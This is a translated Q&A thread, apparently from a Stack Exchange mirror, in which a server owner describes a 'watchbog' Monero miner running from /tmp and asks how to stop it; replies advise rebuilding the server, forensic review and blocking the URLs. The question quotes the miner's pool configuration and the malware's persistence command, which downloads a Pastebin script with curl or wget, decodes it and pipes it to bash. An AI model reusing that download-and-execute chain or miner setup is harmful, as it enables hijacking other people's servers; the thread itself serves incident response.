web-dev-qa-db-ja.com

./watchbogと呼ばれるプロセスが、サーバーで暗号通貨をマイニングしています。どうすれば停止できますか?

以下でこの質問を見つけましたが、もう一度説明する理由があるので、さらに説明が必要です。

CPUを完全に占有している「watchbog」と呼ばれるプロセスがあり、それが何であるかわかりません

それで私はいくつかの調査をしました、そして、実行可能ファイルが/tmpディレクトリから実行されていることがわかりました。フォルダ構造は次のようなものです:

/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data

そのフォルダーには2つのファイルがあり、1つは実際に実行されている実行可能ファイルwatchbogで、もう1つはconfig.jsonです。これは設定ファイルの内容です。

{
    "algo": "cryptonight",
    "api": {
        "port": 0,
        "access-token": null,
        "id": null,
        "worker-id": null,
        "ipv6": false,
        "restricted": true
    },
    "asm": true,
    "autosave": true,
    "av": 0,
    "background": true,
    "colors": true,
    "cpu-affinity": null,
    "cpu-priority": 3,
    "donate-level": 1,
    "huge-pages": false,
    "hw-aes": null,
    "log-file": null,
    "max-cpu-usage": 100,
    "pools": [
        {
            "url": "pool.minexmr.com:443",
            "user": "4AbjKdQkedGZXvzm6VxMJb1zLB2CAmCmXdoCisRsQFAUPs4TWFePDUcZzk5ui4EdZXT3uaXXtssqPCoKQPTz7PeZNkKASkm.old",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": true,
            "variant": -1,
            "tls": false,
            "tls-fingerprint": null
        }
    ],
    "print-time": 60,
    "retries": 5,
    "retry-pause": 5,
    "safe": false,
    "threads": [
        {
            "low_power_mode": 1,
            "affine_to_cpu": false,
            "asm": true
        },
        {
            "low_power_mode": 1,
            "affine_to_cpu": false,
            "asm": true
        }
    ],
    "user-agent": null,
    "syslog": false,
    "watch": false
}

ただし、フォルダを削除しても効果はなく、数秒で再作成されます。だから私は他のプロセスが実行されているものを確認しようとしました、そして私はこれらを見つけました

solr     32616  0.0  0.0   4504   780 ?        Ss   13:10   0:00 /bin/sh -c (curl -fsSL https://Pastebin.com/raw/aGTSGJJp||wget -q -O- h
solr     32618  0.0  0.0  11224  2924 ?        S    13:10   0:00 bash
solr     32623  0.2  0.0  11644  3376 ?        S    13:10   0:00 /bin/bash
solr     32656  200  0.1 270204  6996 ?        Ssl  13:10   0:26 ./watchbog

Pastebin urlは、別のPastebin urlを持つ別のShellコマンドで別のShellコマンドを指します。

(curl -fsSL https://Pastebin.com/raw/nMrfmnRa||wget -q -O- https://Pastebin.com/raw/nMrfmnRa) | base64 -d | /bin/bash

この2番目のPastebin URLは、base64でエンコードされたシェルスクリプトを指します。文字制限のため、ここに含めることはできません。ここにリンクがあります: https://Pastebin.com/raw/nMrfmnRa

私はこの分野の専門家ではありませんが、スクリプトが実行可能ファイルを再度ダウンロードするcronジョブを設定しているようです。

これは私が自分で見つけることができるすべてです、誰も私がこの全体を止めることができる方法についてガイドすることができますか、それともサーバーを再展開する必要がありますか?

malwareshellcode
3
Sayantan Das

私の観点からは、サーバーの他の部分が安全かどうかを判断する方法はありません。私があなただったら、ファイルを厳選して保存し、新しいサーバーを再作成して、サーバーが危険にさらされないようにします。そうしないと、BlankMediaGamesのようになり、数年後にファイルが漏洩する可能性があります。転ばぬ先の杖

5
Thryn

おそらく、サーバーの残りの部分が危険にさらされているかどうかを判断できますが、それはフォレンジック調査に依存します。このリンクを介していくつかのコマンドとオリエンテーションから始めることができます: https://staff.washington.edu/dittrich/misc/forensics/ 。これは少し基本的ですが、単に推測するだけでなく、より良いビジネスへの推奨を提供するのに役立ちます。その間、業務の中断を回避するために、新しいサーバーを作成することをお勧めします。

さらに、ネットワーク境界で悪意のあるURL(:443を介して通信するURL)をブロックし、crontabルーチンを確認することをお勧めします。

Ahhhhh ... Pastebinから情報を取得している何かを見つけた場合、Proアカウントを持っている場合は、Pastebinにその特定のアドレスを削除するように依頼できます。

0
jefferson.macedo